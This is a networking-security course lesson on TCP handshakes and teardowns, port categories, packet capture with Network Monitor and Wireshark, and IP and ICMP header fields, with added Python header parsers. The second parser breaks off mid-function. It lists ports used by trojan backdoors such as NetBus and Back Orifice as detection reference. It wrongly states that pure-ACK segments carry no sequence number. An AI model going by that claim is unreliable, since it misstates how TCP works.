Active Open is when a running application tells TCP to start a communication session with a remote host (which is in Passive Open state). It is possible for two hosts in Active Open to begin communication. It is not a requirement that the remote host be in Passive Open, but that is the most common scenario.
Connection Establishment
In order for the sequence and acknowledgement numbers to have any function, a session between the two hosts must be established. This connection establishment is called the three-way handshake. The three-way handshake involves three distinct steps, which are detailed as follows (please refer to Figure 2-5 when reading this section):
1. Host A sends a segment to Host C with the following:
SYN = 1 (The session is being synchronized.)
ACK = 0 (There is no value in the ACK field, so this flag is a 0.)
Sequence Number = x, where x is a variable. (x is Host A's ISN.)
Acknowledgement Number = 0
2. Host C receives Host A's segment and responds to Host A with the following:
SYN = 1 (The session is still being synchronized.)
ACK = 1 (The acknowledgement flag is now set, as there is an ack value in this segment.)
Sequence Number = y, where y is a variable. (y is Host C's ISN.)
Acknowledgement Number = x + 1 (The sequence number from Host A, plus 1.)
3. Host A receives Host C's segment and responds to Host C with the following:
SYN = 0 (Session is synchronized with this segment; further requests are not needed.)
ACK = 1 (The ack flag is set in response to the SYN from the previous segment.)
Sequence Number = x + 1 (This is the next sequence number in series.)
Acknowledgement Number = y + 1 (The sequence number from Host C, plus 1.)
At this point, the hosts are synchronized and the session is established in both directions, with data transfer to follow.
Figure 2-5: The three-way handshake.
Connection Termination
In addition to specific steps that are involved in the establishment of a session between two hosts, there are equally specific steps in the termination of the session. There are two methods of ending a session using TCP. One is considered graceful, and the other is non-graceful.
A graceful shutdown happens when one host sends a message (using the FIN flag) to the other, stating it is time to end the session; the other acknowledges; and they both end the session. A non-graceful shutdown happens when one host simply sends a message (using the RESET flag) to the other, indicating the communication has stopped, with no acknowledgements and no further messages sent. In this section, we will investigate the details of the standard graceful termination.
As you saw earlier, it requires three segments to establish a TCP session between two hosts. The other side of the session, the graceful termination, requires four segments. Four segments are required because TCP is a full-duplex communication protocol (meaning data can be flowing in both directions independently). As per the specifications of TCP, either end of a communication can end the session by sending a FIN, which has a sequence number just as a SYN has a sequence number.
Similar to the Active and Passive Opens mentioned earlier, there are also Active and Passive Closes. The host that begins the termination sequence, by sending the first FIN, is the host performing the Active Close. The host that receives the first FIN is the host that is performing the Passive Close. The graceful teardown of a session is detailed as follows (please refer to Figure 2-6 when reading this section):
1. Host A initiates the session termination to Host C with the following:
FIN = 1 (The session is being terminated.)
ACK = 1 (There is an ack number, based on current communication.)
Sequence Number (FIN number) = s (s is a variable based on the current communication.)
Acknowledgement Number = p (p is a variable based on the current communication.)
2. Host C receives Host A's segment and replies with the following:
FIN = 0 (This segment is not requesting closure of the session.)
ACK = 1 (This segment does contain an ack number.)
Sequence Number = Not Present (As there is no FIN, there is no sequence number required.)
Acknowledgement Number = s + 1 (This is the response to Host A's FIN.)
3. Host C initiates the session termination in the opposite direction with the following:
FIN = 1 (The session is being terminated.)
ACK = 1 (There is an ack number.)
Sequence Number = p (p is a variable based on the current communication.)
Acknowledgement Number = s + 1 (This is the same as in the previous segment.)
4. Host A receives the segments from Host C and replies with the following:
FIN = 0 (This segment does not request a termination, there is no SYN.)
ACK = 1 (This segment does contain an ack number.)
Sequence Number = Not Present
Acknowledgement Number = p + 1 (This is Host C's sequence number, plus 1.)
At this point the session has been terminated. Communication in both directions has had a FIN requested and an acknowledgement to the FIN, closing the session.
Figure 2-6: Connection termination.
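As an added example that is not part of the course text, the following Python decodes the six control flags and the sequence and acknowledgement numbers from a raw TCP header (the same fields the TCP Flags section describes) and then checks that an exchange follows the three-way handshake and the four-segment graceful close exactly as the two step lists above lay them out; the same checks can be run over frames exported from a capture. The header bytes are constructed inline for the demonstration and the function names are my own.

```python
import struct

# Flag bits in byte 13 of the TCP header, named as the text names them.
FLAG_BITS = {"URGENT": 0x20, "ACK": 0x10, "PUSH": 0x08, "RESET": 0x04, "SYN": 0x02, "FIN": 0x01}
MASK32 = 0xFFFFFFFF  # sequence and acknowledgement numbers are 32-bit values and wrap


def build_segment(sport, dport, seq, ack, flags, window=65535):
    """Constructed 20-byte TCP header (no options, checksum left zero) for the checks below."""
    flag_byte = 0
    for name in flags:
        flag_byte |= FLAG_BITS[name]
    data_offset = 5 << 4  # header length in 32-bit words, stored in the high nibble
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, data_offset, flag_byte, window, 0, 0)


def parse_segment(raw):
    """Decode ports, sequence/acknowledgement numbers and the set flags from a raw TCP header."""
    if len(raw) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    sport, dport, seq, ack, offset_byte, flag_byte, window, _csum, _urg = struct.unpack("!HHIIBBHHH", raw[:20])
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack, "window": window,
        "header_len": (offset_byte >> 4) * 4,
        "flags": {name for name, bit in FLAG_BITS.items() if flag_byte & bit},
    }


def _replies_to(reply, original):
    """True when `reply` travels back along the same socket pair as `original`."""
    return (reply["sport"], reply["dport"]) == (original["dport"], original["sport"])


def check_handshake(segments):
    """Deviations from the three-way handshake as laid out in the text; an empty list means it matched."""
    if len(segments) != 3:
        return ["expected exactly three segments"]
    a, c, a2 = (parse_segment(s) for s in segments)
    x, y = a["seq"], c["seq"]  # the two hosts' ISNs
    problems = []
    if a["flags"] != {"SYN"} or a["ack"] != 0:
        problems.append("segment 1: SYN only, acknowledgement number 0")
    if not _replies_to(c, a) or c["flags"] != {"SYN", "ACK"} or c["ack"] != (x + 1) & MASK32:
        problems.append("segment 2: SYN and ACK from C back to A, acknowledging x + 1")
    if not _replies_to(a2, c) or a2["flags"] != {"ACK"}:
        problems.append("segment 3: ACK only, SYN cleared")
    if a2["seq"] != (x + 1) & MASK32 or a2["ack"] != (y + 1) & MASK32:
        problems.append("segment 3: sequence number x + 1, acknowledging y + 1")
    return problems


def check_teardown(segments):
    """Deviations from the four-segment graceful close in the text; an empty list means it matched.
    The text lists no sequence number for the two pure ACKs, so those are left unconstrained."""
    if len(segments) != 4:
        return ["expected exactly four segments"]
    a, c, c2, a2 = (parse_segment(s) for s in segments)
    s, p = a["seq"], c2["seq"]  # FIN numbers of the Active and Passive Close
    problems = []
    if a["flags"] != {"FIN", "ACK"}:
        problems.append("segment 1: FIN and ACK from the host doing the Active Close")
    if not _replies_to(c, a) or c["flags"] != {"ACK"} or c["ack"] != (s + 1) & MASK32:
        problems.append("segment 2: pure ACK of s + 1")
    if c2["flags"] != {"FIN", "ACK"} or c2["ack"] != (s + 1) & MASK32:
        problems.append("segment 3: FIN and ACK, still acknowledging s + 1")
    if not _replies_to(a2, c2) or a2["flags"] != {"ACK"} or a2["ack"] != (p + 1) & MASK32:
        problems.append("segment 4: pure ACK of p + 1")
    return problems


if __name__ == "__main__":
    x, y = 1000, 5000  # constructed ISNs for Host A (port 40000) and Host C (port 80)
    handshake = [
        build_segment(40000, 80, x, 0, {"SYN"}),
        build_segment(80, 40000, y, x + 1, {"SYN", "ACK"}),
        build_segment(40000, 80, x + 1, y + 1, {"ACK"}),
    ]
    for raw in handshake:
        seg = parse_segment(raw)
        print(f"{seg['sport']:>5} -> {seg['dport']:<5} seq={seg['seq']} ack={seg['ack']} flags={sorted(seg['flags'])}")
    print("handshake problems:", check_handshake(handshake))
```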
Ports
You have been introduced to the fact that IP deals with addressing and the
sending/receiving of data between two hosts, and you have been introduced to the
fact that TCP can be selected to provide reliable delivery of data. However, if a
client sends a request to a server that is running many services, such as WWW,
NNTP, SMTP, and FTP, how does the server know which application is supposed
to receive the request? The answer is by specifying ports.
Port numbers are located in the TCP or UDP header, and they are 16-bit values, ranging from 0 to 65535. Port numbers can be assigned to specific functions or applications. Ports can also be left open for dynamic use by two hosts during communication. There are ranges of ports for each function. There are three main categories of ports: well-known, registered, and dynamic.
The well-known ports (also called reserved ports by some) are those in the range of 0 to 1023. These port numbers are assigned to specific applications and need to remain constant for the primary services of the Internet to continue to provide the flexibility and usefulness it does today. For example, the WWW service is port 80, the Telnet service is port 23, the SMTP service is port 25, and so on. The well-known port list is maintained by the Internet Assigned Numbers Authority (IANA), and can be found here: www.iana.org/assignments/port-numbers.
Registered ports are those in the range of 1024 to 49151. These port numbers can be registered to a specific function, but are not defined or controlled by a governing body, so multiple functions could end up using the same port.
Dynamic ports (also called private ports) are those from 49152 to 65535. Any user of the Internet can use dynamic ports.
When a client connects to a server and requests a resource, that client also requires a port. The client ports (also called ephemeral ports by some) are used by a client during one specific connection; each subsequent connection will use a different port number. These ports are not assigned to any default service, and are usually a number greater than 1023. There is no defined range for client ports; they can cover the numbers of both the registered and dynamic port ranges.
When a client begins a session by requesting a service from a server, such as the WWW service on port 80, the client uses an ephemeral port on the client side. This enables the server to respond to the client. Data is then exchanged between the two hosts using the port numbers established for that session: 80 on the server side, and a dynamic number greater than 1023 on the client side. The combination of the IP address and port is often referred to as a socket, and the two hosts together are using a socket pair to communicate for this session.
The following table lists some of the well-known ports and their associated
services.
Some Well-known Ports and their Services
Port Service
23 Telnet
80 HTTP (Standard web pages)
443 Secure HTTP (Secure web pages)
20 and 21 FTP (Data and control)
53 DNS
25 SMTP
119 NNTP
In addition to known valid services, such as those listed previously, there are many Trojan Horse programs that use specific ports (although the port can usually be changed).
Ports Associated with Trojan Horses
Port Number Name of Trojan Horse
12345 NetBus
1243 Sub Seven
27374 Sub Seven 2.1
31337 Back Orifice
54320 (TCP) Back Orifice 2000 (BO2K)
54321 (UDP) Back Orifice 2000 (BO2K)
Network Monitor
There is a very valuable tool available with Windows called Network Monitor. This tool allows for full packet capture and lets the analyst (you) peer into the packet's contents, examining both the payload, or data, and the headers, in detail. You can see any set flags, the defined sequence and acknowledgement numbers, packet size, and more. The following is a discussion on the use of Network Monitor, provided as background for you to be able to perform the tasks in this lesson.
Some of the things you can do with Network Monitor are:
Monitor real-time network traffic.
Analyze network traffic.
Filter specific protocols to capture.
In this lesson, you will be focusing on the capture and analysis of IP packets, and on the details of the protocol suite.
Trojan Horse: An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.
Figure 2-7: The default view of Network Monitor, showing the various panes.
In Figure 2-7, you can see the default view of Network Monitor. In this view, the screen is split into several sections.
The top bar is the standard menu bar found in Microsoft programs. The basic functions on the toolbar that you will use in this lesson are contained in the File and Capture menus.
The File menu contains three commands: Open, Save As, and Exit.
Choose Open to open a previously saved Network Monitor capture.
Choose Save As to save a Network Monitor capture.
Choose Exit to exit.
The Capture menu has more commands: Start, Stop, Stop And View, Pause, and Continue.
The Start, Pause, and Continue commands are self-explanatory.
The difference between Stop and Stop And View is that the Stop command ends the capture. The Stop And View command ends the capture and switches Network Monitor to its next mode, Display View.
The other sections of the Capture View are panes (windows in a window) called Graph, Session Stats, Station Stats, and Total Stats.
The Graph pane provides five bars that measure percentages of pre-defined metrics.
The top graph indicates the percentage (%) of network utilization, meaning how much the network is being used.
The second graph indicates the number of frames per second, meaning frames transmitted per second over the network.
The third graph indicates the number of bytes per second that are transmitted over the network.
The fourth graph indicates the number of broadcasts per second that are transmitted over the network.
The fifth graph indicates the number of multicasts per second that are transmitted over the network.
While a capture is running, these graphs work in real time, providing current data.
The next pane is the Session Stats pane. In this pane, you can see the sessions that are taking place during the capture.
Following the Session Stats is the Station Stats pane. In this pane, you can see statistics per interface on the host, per broadcast, per multicast, and more.
The final pane in this view is the Total Stats pane. The Total Stats pane is subdivided into sections: Network Statistics, Captured Statistics, Per Second Statistics, Network Card (MAC) Statistics, and Network Card (MAC) Error Statistics. From this pane, you can identify frames, broadcasts, multicasts, network utilization, errors, and more, all in real time during the capture.
Displaying Captures
After you have captured network traffic, you can begin your analysis, which requires a different view of Network Monitor. You will need to use the Display View. You can switch to the Display View by either using the Capture→Stop And View command or by using the Display Captured Data command after a capture session has been stopped.
Figure 2-8: The Summary View of Network Monitor.
When you first open the Summary View, as shown in Figure 2-8, you will see a timeline of packets captured. By double-clicking any packet that was captured, you can look into its details and bring up the next view of Network Monitor. Once you have selected a packet, Network Monitor displays three panes for presenting information to you.
Figure 2-9: The details of a packet in Network Monitor.
The top pane shown in Figure 2-9 is the Summary pane. This pane provides the
basic details of a packet, such as:
Frame number
Time the packet was captured
Destination and source MAC addresses
Protocol used
Destination and source IP addresses
The middle pane shown in Figure 2-9 is the Detail pane. This pane provides the
actual details of the protocol for the selected packet. Any line that has a plus sign
next to it can be expanded for further detail.
The bottom pane in Figure 2-9 is the Hex pane. This pane provides the actual
Hex value for the raw data that each frame is comprised of. When you select
something in the Detail pane, it is highlighted in the Hex pane for comparison.
Also, in this pane, the ASCII characters are visible. In the event that cleartext is
captured, this is where it will be readable.
Network Monitor Filters
Because Network Monitor has the ability to capture all network traffic, it would
be very easy to capture too much information and have difficulty in nding what
you were looking for. This is where ltering comes into play. There are two types
of lters available in Network Monitor: capture lters and display lters. For
example, if you wanted to capture only TCP messages, you could create a capture
lter so that only TCP messages are captured. If you wanted to view only ICMP
messages, you could create a display lter so that all you see are ICMP
messages. Figure 2-10 and Figure 2-11 show the dialog boxes used for each lter
type.
Lesson 2: Advanced TCP/IP 55
To create or use lters, choose CaptureFilter. Using lters not only makes it
easier for you, as an analyst, to nd what you are looking for, but they allow for
the buffer that stores the capture to not be lled with useless information.
Figure 2-10: Network Monitors Capture Filter dialog box.
Figure 2-11 shows the Display Filter dialog box.
Figure 2-11: Network Monitor's Display Filter dialog box.
When using filtering, you will likely use either protocol or address filtering. With protocol filtering, you identify a specific protocol to work with. With address filtering, you define the specific address to filter on. Filters can be implemented in different directions: traffic into this host, outbound from this host, or in both directions. These options are implemented by selecting the appropriate arrow (one of these three: --->, ---<, or <-->) for the function you want to perform.
TASK 2B-1
Using Network Monitor
1. Open a command prompt, and enter ipconfig /all
If you are on the LEFT side of the classroom, your IP addresses will be 172.16.10.x. If you are on the RIGHT side of the classroom, your IP addresses will be 172.18.10.x.
2. Record the MAC and IP address for the network card in your computer.
MAC address: Each card will have a unique MAC address.
IP address: Each card will have a unique IP address.
3. Close the Command Prompt window.
4. Open Network Monitor. (From the Start menu, choose All Programs→Administrative Tools→Network Monitor.)
5. If you see the Microsoft Network Monitor message box, click OK to display the Select A Network dialog box. Expand the + sign next to Local Computer, select the interface with the MAC address associated with the network interface you recorded in Step 2, and click OK.
6. From the Capture menu, choose Start, or press F10 to start a capture.
7. If you are on the LEFT side of the classroom, ping the IP address 172.16.0.1. If you are on the RIGHT side of the classroom, ping the IP address 172.18.0.1. This will create network traffic for you to capture.
8. Wait for 20 to 30 seconds. As you wait, watch the real time statistics
change in the Network Monitor Capture window.
9. Choose Capture→Stop And View. You should now see the Display View, including the timeline of the packets captured.
10. Double-click any packet to change to the Detail View.
11. Observe the structure of the three panes in this view, and expand any +
signs displayed in the middle pane.
12. From the Display menu, choose Filter.
13. Highlight Protocol==Any, and click the Edit Expression button.
14. With the Protocol tab selected, click the Disable All button.
15. Scroll down to ICMP, select ICMP, and click the Enable button. The Expression field at the top of the dialog box should now display Protocol == ICMP. Click OK.
16. Click OK to implement this filter on your capture.
17. Observe that only ICMP frames are visible in your window now.
18. From the File menu, choose Save As, and save the capture as First_Capture.cap in the default location.
19. Close Network Monitor.
Wireshark
Another product you can use to capture data is called Wireshark. (Wireshark was formerly known as Ethereal, with the name change taking place in 2006.) With Wireshark, data can be captured off the wire or read from a captured file. Data can also be saved to a file format that Microsoft Network Monitor can understand. Wireshark supports analysis of over 750 Data Link, Network, Transport, and Application layer protocols. Wireshark can be downloaded from www.wireshark.org.
To perform promiscuous mode captures on a Windows machine, you have to first download and install the latest stable version of WinPcap; do not install any alpha or beta versions. WinPcap is the Windows equivalent of libpcap (LIBrary for Packet CAPtures) for Linux. It can be obtained from www.winpcap.org. In fact, you will use WinPcap later in the course, along with other tools such as windump, tcpdump, nmap, and snort.
TASK 2B-2
Installing and Starting Wireshark
1. Choose Start→My Computer.
2. Open C:\Tools\Lesson2. Note: If you do not have a C:\Tools folder, please review the tools section of the Setup Guide.
3. Double-click the WinPcap_4_0.exe file.
4. In the WinPcap_4_0.exe Installer Welcome screen, click Next.
5. In the WinPcap 4.0 Setup Wizard screen, click Next.
6. Read the License Agreement, and click I Agree.
7. To close the WinPcap install wizard, click Finish.
8. Double-click the Wireshark_setup-0.99.5.exe file.
9. In the Wireshark Setup Wizard Welcome screen, click Next.
promiscuous mode: Normally an Ethernet interface reads all address information and accepts follow-on packets only if they are destined for itself, but when the interface is in promiscuous mode, it reads all information (sniffer), regardless of its destination.
10. Read the License Agreement, and click I Agree.
11. Accept the Default Components (do not make any changes), and click Next.
12. Accept the Default Additional Tasks (do not make any changes), and click
Next.
13. Accept the Default Destination Folder, and click Next.
14. You have already installed WinPcap, so do not check any boxes on the
WinPcap screen, and click Install.
15. In the Installation Complete screen, click Next.
16. In the Completing The Wireshark 0.99.5 Setup Wizard screen, check the Run Wireshark 0.99.5 check box and click Finish.
17. Leave Wireshark open for the following tasks.
Wireshark Overview
When you first start Wireshark (formerly called Ethereal), you will see a GUI with three panes. The top pane lists the captured frames in sequence. When you highlight a frame, the middle pane provides protocol layer information about that frame, and the bottom pane shows the details of the frame in both hex and ASCII values.
Figure 2-12: The Ethereal (Wireshark) GUI.
At the top of the GUI there is a menu bar, with File, Edit, View, Go, Capture, Analyze, Statistics, and Help. Just above the top pane is a Filter button, a drop-down menu, an Expression button, a Clear button, and an Apply button. These buttons allow you to filter the captured data, which, as you will see, is a very important feature.
When you wish to start a capture in Wireshark, you have several options. You can go to the Capture drop-down menu and select Start, or you can simply press the third icon from the right in the icons listed just below the main menu bar. However, as this is the first time you are running Wireshark, you must define some options. A quick way to the options screen is to press the Ctrl+K key combination. When you do so, you will see a window with many options, where you can make some specific selections, including the following:
The interface to capture packets from.
The limit to the number of packets to capture (if any).
Whether you wish to capture packets in promiscuous mode or not.
Any filters you wish to use.
The file name for the capture file.
Whether you wish to view the packets onscreen in real time.
Parameters to define when the capture should stop.
Whether you wish to enable or disable name resolution at the Data Link, Network, and Transport layers.
Figure 2-13: Ethereal's (Wireshark's) Capture Options dialog box.
When you click OK, the capture will start on the selected network interface, and you will see another pop-up informing you of that. Wireshark will continue with the capture until you click the Stop button.
Figure 2-14: Ethereal (Wireshark) pop-up displaying capture information.
Once you have selected your options and clicked OK, the capture will start on the selected network interface, and you will see a pop-up window informing you of the capture in progress. Wireshark will continue with the capture until you press the Stop button or an option you configured tells the capture to stop.
Figure 2-15: The many Save As options in Ethereal (Wireshark).
After you stop a capture, you can view and analyze the data for your current use. When you are done and wish to save the file for future analysis, you have many options.
Notice how many choices you have for saving a capture; you can save to Network Monitor's format if you want. (Conversely, Wireshark will read a capture saved by any of the protocol analyzers in the list.) When you are done with capture and analysis and want to close the program, choose File→Quit or press Ctrl+Q.
TASK 2B-3
Using Wireshark
Setup: Wireshark has been successfully installed and is running on
your computer.
1. From the menu options, choose Capture→Options.
2. In the Interface drop-down list, select your local area network adapter.
3. Notice that when you select your adapter, directly below the word Inter-
face, the program has listed your LAN address.
4. Make sure that the Capture Packets In Promiscuous Mode check box is
checked.
5. Under Display Options, check the Update List Of Packets In Real Time
check box.
6. Click the Start button and open a command prompt.
7. Ping your Default Gateway IP Address.
8. When the ping has completed, close the command prompt, return to Wireshark, and choose Capture→Stop.
9. Double-click any frame where your computer is the Source and the Des-
tination is the Default Gateway IP Address you just pinged. The protocol
will be listed as ICMP.
10. Expand and view the frame details.
11. Note that you can analyze data in a similar fashion as in Network
Monitor.
12. Once you are done with this initial look at Wireshark, close the application.
13. Click the Continue Without Saving button.
TCP Connections
Earlier, you were introduced to the function and the process of control flags, the three-way handshake, and the session teardown. In this section, you are going to use Network Monitor to view the three-way handshake, packet by packet, and to view the teardown, packet by packet.
Remember, the three-way handshake is used by two hosts when they are creating a session. The first host begins by sending out a packet with the SYN flag set, and no other flags. The second packet is a response with both the SYN and ACK flags set. The third part of the session establishment will have the ACK flag set.
TASK 2B-4
Analyzing the Three-way Handshake
1. Choose Start→Administrative Tools→Services.
2. Right-click Telnet and choose Properties.
3. In the Startup type drop-down menu, select Manual.
4. Click Apply.
5. Click the Start button.
6. Click OK.
7. Close the Services window.
8. Open Network Monitor, and start a capture.
9. At a command prompt:
If you are on the LEFT side of the classroom, enter telnet 172.16.0.1
If you are on the RIGHT side of the classroom, enter telnet 172.18.0.1
Enter y; at the Login prompt, type anonymous and press Enter; at the Password prompt, press Enter.
10. Press Enter repeatedly, or enter a bad password, until your connection to the host is lost. Your screen may resemble the following graphic.
Minimize the command prompt window.
11. Switch back to Network Monitor, and choose Capture→Stop And View.
12. In the Summary pane, identify the frames that are involved in the three-
way handshake.
13. Once you have identified the frames that are part of the three-way handshake, based on the discussion, look for the following:
a. In the first frame, what are the SEQ number, ACK number, and flags?
b. In the second frame, what are the SEQ number, ACK number, and flags?
c. In the third frame, what are the SEQ number, ACK number, and flags?
14. Expand each of the three frames in the handshake, and examine them in
greater detail in the Detail pane.
15. Using the Hex pane, identify the value for the flags that are set for each frame of the three-way handshake.
16. Leave Network Monitor open, along with this capture, for the next task.
The Session Teardown Process
Previously, you examined the session teardown process. Here, you will examine
the details of the session teardown. Remember, there are four parts of session
teardown.
TASK 2B-5
Analyzing the Session Teardown Process
Setup: Network Monitor is running, and the last capture you per-
formed is displayed.
1. In the Summary pane, identify the frames that are involved in the session
teardown.
2. Once you have identied the frames, examine them in greater detail in the
Detail pane.
3. In each frame, identify at least the following:
a. Flags that are set.
b. Sequence number.
c. Acknowledgement number.
4. Save the capture as TCP_Connections.cap and close the capture.
5. Minimize Network Monitor.
Topic 2C
Capturing and Identifying IP Datagrams
Along with TCP, the protocol you will spend the most time analyzing will be IP. This protocol is the one that does the most work of the entire TCP/IP suite. In Figure 2-16, you can see the actual format of the IP datagram. There are seven rows of information in the figure, with the critical rows being the first five. When a computer receives an IP datagram, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.
To work with IP further, refer to RFC 791.
Figure 2-16: An IP datagram with all fields shown.
Using Figure 2-16, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the IP header.
Starting on Row One, on the left side is a field called Version. This is a 4-bit field that defines the version of IP that is currently running. Right now, this will likely be a value of 4, as that is the current industry standard: IPv4, or IP version 4. Some instances may be using IP version 6, or IPv6, which you will examine later in the course.
Moving to the right of the Version is a field called Header Length (IHL). This is a 4-bit field that defines the number of 32-bit words in the header itself, including options. In most captures, this value will be 5 (no options set), the normal value.
Continuing to the right of Header Length is a field called Type Of Service. This is an 8-bit field that defines the quality of service for this packet. Different applications may have different needs for available bandwidth, and Type Of Service is one way of addressing those needs.
The last field on Row One is the field called Total Length. This is a 16-bit field that defines the length of the entire IP datagram in bytes.
Starting on Row Two, on the left side is a field called Identification. This is a 16-bit field that identifies each datagram sent by the host. The standard for this field is for the identification value to increment by one for every datagram sent.
Following the Identification field is a field called Flags. Not to be confused with the flags of TCP, which you have seen, this is a 3-bit field that is used in conjunction with fragmentation. The first of the three bits is to be set at 0, as a default. The next bit is known as the DF bit, or Don't Fragment. The third bit is known as the MF bit, or More Fragments.
The last field on Row Two is a field called Fragment Offset. This is a 13-bit field that is used to define where in the datagram this fragment belongs. (If there is fragmentation, the first fragment will have an offset of 0.)
Starting on Row Three, on the left side, is a field called Time To Live. This is an 8-bit field that is used to define the maximum amount of time this datagram may be allowed to exist in the network. The TTL is set by the sender and is lowered by 1 by every router that the datagram crosses. If the TTL reaches 0, the packet is to be discarded.
Moving to the right is a field called Protocol. This is an 8-bit field that is used to define the upper-layer protocol that is in use for this datagram. There are many unique protocol numbers, and if you wish to study all of the numbers, please refer to RFC 790. However, the following list identifies several important Protocol ID numbers:
Protocol ID Number 1: ICMP
Protocol ID Number 6: TCP
Protocol ID Number 17: UDP
The final field on Row Three is a field called Header Checksum. This is a 16-bit field that is used to provide a check on the IP header only; this is not a checksum for any data following the header. This checksum provides integrity for the header itself.
The Fourth Row is a single field, the Source IP Address. This field is a 32-bit value that identifies the IP address of the source host of this packet.
The Fifth Row is also a single field, the Destination IP Address. This field is a 32-bit value that identifies the IP address of the destination host for this packet.
The Sixth Row contains any options that may be present. This is a variable-length field, with no absolute fixed size to the options. Some of the options that may be in this field are those that are related to routing or timekeeping. If options are used, padding will be added so this field equals 32 bits in size.
The Seventh and final Row is the representation of the data. By this point, the header is complete and the data the user wishes to send or receive is stored in the packet.
TASK 2C-1
Capturing and Identifying IP Datagrams
Setup: You are logged on to Windows Server 2003 as Administrator.
A command prompt and Network Monitor are running.
1. In Network Monitor, start a new capture, and leave the capture
running.
2. Open a command prompt and enter ftp ip_address where ip_address is the address of a neighbor computer.
integrity: Assuring information will not be accidentally or maliciously altered or destroyed.
3. The connection will not be successful at this time; type bye and close the command prompt.
4. Return to Network Monitor and choose Capture→Stop And View.
5. Observe the Protocol column. Apply a filter to show only TCP. For the specific steps, see Task 2B-1, step 12 through step 16. Click any of the frames and observe that the TCP control bits include FTP.
6. Examine the IP header, compared to the discussion. Look for the following:
a. Version Number.
b. Time To Live.
c. Protocol ID.
d. Source Address.
e. Destination Address.
7. Once you are done examining the IP header, save the capture as
IP_Header.cap and close the capture le.
Topic 2D
Capturing and Identifying ICMP Messages
When you are analyzing protocols, it should become immediately apparent that there are differences between ICMP and the other protocols discussed in this lesson. There is a similar concept in that the ICMP message is encapsulated in the IP datagram, just as you saw with TCP and UDP. In Figure 2-17, you can see the actual format of the ICMP message. There are only two rows of information shown in the figure.
Figure 2-17: An ICMP message with all fields shown.
To work with ICMP further, refer to RFC 792.
Using Figure 2-17, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze an ICMP message.
Starting on Row One, on the left side, the first field is called Type. This is an 8-bit value that identifies the specific ICMP message. For example, a Type could be 3, which is a type of unreachable message.
Following Type on Row One is a field called Code. This is an 8-bit value that works in conjunction with Type to define the specific details of the ICMP message. For example, using Type 3, the Code could be 1, which is destination host unreachable.
Moving along on Row One, the final field is called Checksum. This is a 16-bit value that checks the integrity of the entire ICMP message.
The Second Row has no fixed fields. Depending on the Type and Code of the ICMP message, this field may contain many things. One example of what may go in this field is the time stamping of messages.
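To see the Row One through Row Five fields of the IP header (Topic 2C) and the Type, Code, and Checksum fields of the ICMP message (above) the way a receiving host reads them, here is an added Python example. It is not part of the course and not Network Monitor's code: it parses a constructed packet shaped like a Windows ping (an ICMP echo request from 172.16.10.5 to 172.16.0.1) and verifies both checksums, the IP one over the header only and the ICMP one over the whole message. The packet bytes, addresses, Identification value, and ping payload are constructed for the example; the checksum routine follows RFC 1071 and the Type 3 code names follow RFC 792.

```python
"""Parse an IPv4 header and the ICMP message inside it, field by field (RFC 791 / RFC 792).

Added example, not course material: the packet below is constructed to look like a
Windows ping (echo request) from 172.16.10.5 to 172.16.0.1.
"""
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

PROTOCOL_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}
ICMP_TYPE_NAMES = {0: "Echo Reply", 3: "Destination Unreachable",
                   8: "Echo Request", 11: "Time Exceeded"}
# RFC 792 codes for Type 3; Code 1 is the "destination host unreachable" case from the text.
UNREACHABLE_CODES = {0: "net unreachable", 1: "host unreachable", 2: "protocol unreachable",
                     3: "port unreachable", 4: "fragmentation needed and DF set",
                     5: "source route failed"}


def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words (RFC 1071). Over a valid header it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:                      # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


@dataclass
class IPv4Header:
    version: int
    ihl: int                # Row One: header length in 32-bit words (5 = no options)
    tos: int
    total_length: int
    identification: int     # Row Two
    df: bool
    mf: bool
    fragment_offset: int    # in 8-byte units
    ttl: int                # Row Three
    protocol: int
    header_checksum: int
    checksum_ok: bool
    src: str                # Row Four
    dst: str                # Row Five
    options: bytes          # Row Six (empty when ihl == 5)


def parse_ipv4(packet: bytes) -> Tuple[IPv4Header, bytes]:
    """Read the header as a host would; return it with the payload (Row Seven)."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, tos, total_length, ident, flags_frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    if version != 4 or ihl < 5:
        raise ValueError(f"not a valid IPv4 header (version={version}, IHL={ihl})")
    header_len = ihl * 4
    if len(packet) < header_len or total_length < header_len:
        raise ValueError("header length exceeds packet or Total Length")
    header = IPv4Header(
        version=version, ihl=ihl, tos=tos, total_length=total_length, identification=ident,
        df=bool(flags_frag & 0x4000), mf=bool(flags_frag & 0x2000),
        fragment_offset=flags_frag & 0x1FFF, ttl=ttl, protocol=proto, header_checksum=csum,
        checksum_ok=internet_checksum(packet[:header_len]) == 0,   # header only, never data
        src=".".join(str(b) for b in src), dst=".".join(str(b) for b in dst),
        options=packet[20:header_len])
    return header, packet[header_len:total_length]


@dataclass
class ICMPMessage:
    type: int
    code: int
    checksum: int
    checksum_ok: bool       # covers the whole ICMP message, header and data
    rest_of_header: bytes   # Row Two: meaning depends on Type and Code
    data: bytes
    identifier: Optional[int] = None   # echo request/reply only
    sequence: Optional[int] = None


def parse_icmp(message: bytes) -> ICMPMessage:
    if len(message) < 8:
        raise ValueError("truncated ICMP message")
    icmp_type, code, csum = struct.unpack("!BBH", message[:4])
    msg = ICMPMessage(type=icmp_type, code=code, checksum=csum,
                      checksum_ok=internet_checksum(message) == 0,
                      rest_of_header=message[4:8], data=message[8:])
    if icmp_type in (0, 8):             # echo: Row Two holds Identifier and Sequence Number
        msg.identifier, msg.sequence = struct.unpack("!HH", message[4:8])
    return msg


def describe(packet: bytes) -> str:
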